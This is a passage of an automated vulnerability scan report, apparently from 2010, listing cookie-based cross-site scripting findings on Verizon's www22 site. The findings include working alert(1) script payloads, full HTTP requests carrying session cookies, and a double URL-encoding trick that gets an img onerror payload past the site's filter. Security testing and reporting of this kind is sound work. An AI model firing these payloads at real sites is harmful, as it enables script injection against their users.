Expires: Sat, 20 Nov 2010 02:34:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:34:35 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:34:35 GMT; path=/
Set-Cookie: ContextInfo_State=TX7d0c5'><script>alert(1)</script>43771b3ed61; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:34:35 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:34:35 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:34:35 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7D0C5'><SCRIPT>ALERT(1)</SCRIPT>43771B3ED61 ' />
...[SNIP]...

1.180. http://www22.verizon.com/residential/fiostv [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/fiostv

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 1308a<script>alert(1)</script>db496b94b77 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/fiostv HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX1308a<script>alert(1)</script>db496b94b77; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 109080
Expires: Sat, 20 Nov 2010 02:34:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:34:36 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:34:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX1308a<script>alert(1)</script>db496b94b77; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:34:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:34:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:34:36 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX1308A<SCRIPT>ALERT(1)</SCRIPT>DB496B94B77 </DIV>
...[SNIP]...

1.181. http://www22.verizon.com/residential/internet [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/internet

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 58ed3'><script>alert(1)</script>0170848a901 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/internet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX58ed3'><script>alert(1)</script>0170848a901; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73115
Expires: Sat, 20 Nov 2010 02:34:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:34:34 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX58ed3'><script>alert(1)</script>0170848a901; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX58ED3'><SCRIPT>ALERT(1)</SCRIPT>0170848A901 ' />
...[SNIP]...

1.182. http://www22.verizon.com/residential/internet [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/internet

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 440a7<script>alert(1)</script>c3c99db1614 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/internet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX440a7<script>alert(1)</script>c3c99db1614; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71515
Expires: Sat, 20 Nov 2010 02:34:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:34:39 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX440a7<script>alert(1)</script>c3c99db1614; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX440A7<SCRIPT>ALERT(1)</SCRIPT>C3C99DB1614 </DIV>
...[SNIP]...

1.183. http://www22.verizon.com/residential/specialoffers/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/specialoffers/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86d8a%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e846110cd72c was submitted in the vzapps cookie. This input was echoed as 86d8a"><img src=a onerror=alert(1)>846110cd72c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the vzapps cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /residential/specialoffers/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX86d8a%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e846110cd72c; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Sat, 20 Nov 2010 02:32:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:32:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCSBCCATB=CIFHEODCPMMECMCGGBNGIKGB; path=/
Content-Length: 126538



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<title>Verizon | Residential Specia
...[SNIP]...
<script type="text/javascript" src="/residential/specialoffers/zipcheck?st=TX86d8a"><img src=a onerror=alert(1)>846110cd72c">
...[SNIP]...

1.184. http://www22.verizon.com/residentialhelp [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload b345f<script>alert(1)</script>7ee3ccadb71 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXb345f<script>alert(1)</script>7ee3ccadb71; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 175791
Expires: Sat, 20 Nov 2010 01:45:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:45:21 GMT
Connection: close

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TXb345f<script>alert(1)</script>7ee3ccadb71 </span>
...[SNIP]...

1.185. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [vzapps cookie] previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/foryourhome/fttprepair/nr/common/MainMenu.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 507fa<script>alert(1)</script>414136f05bc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /foryourhome/fttprepair/nr/common/MainMenu.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX507fa<script>alert(1)</script>414136f05bc; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 175791
Expires: Sat, 20 Nov 2010 01:44:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:44:52 GMT
Connection: close

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TX507fa<script>alert(1)</script>414136f05bc </span>
...[SNIP]...

Report generated by Hoyt LLC at Fri Nov 19 22:56:42 CST 2010.